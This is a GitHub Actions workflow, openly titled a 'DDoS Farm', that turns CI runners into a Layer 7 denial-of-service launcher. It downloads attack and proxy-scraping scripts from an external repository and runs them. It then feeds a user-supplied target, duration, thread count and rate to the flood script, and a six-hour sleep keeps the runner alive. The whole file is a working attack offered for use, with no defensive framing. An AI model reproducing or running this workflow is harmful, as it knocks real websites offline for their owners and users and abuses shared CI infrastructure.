name: DDoS Farm Layer7 + Auto Fresh Proxy

on:
  workflow_dispatch:
    inputs:
      method:
        default: '2'
        type: choice
        options: ['1','2','3','4']
      target:
        required: true
      time:
        default: '1800'
      threads:
        default: '128'
      rate:
        default: '256'

jobs:
  attack:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/setup-node@v4
        with: { node-version: 20 }
      - uses: actions/setup-python@v5
        with: { python-version: '3.11' }

      - name: Download tools
        run: |
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/cf.js
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/run.py
          wget -q https://raw.githubusercontent.com/112jb/mlonghehe/main/proxy.js
          chmod +x *

      - name: Lấy proxy tươi
        run: |
          node proxy.js

      - name: Bắn Layer7 (FINAL 100% CHẠY)
        run: |
          cat > auto_input.txt << EOF
          2
          y
          1
          ${{ inputs.method }}
          ${{ inputs.target }}
          ${{ inputs.time }}
          ${{ inputs.threads }}
          ${{ inputs.rate }}
          proxy.txt
          EOF

          nohup python3 run.py < auto_input.txt > attack.log 2>&1 &
          sleep 5
          tail -n 30 attack.log

      - name: Keep alive
        run: sleep 21600
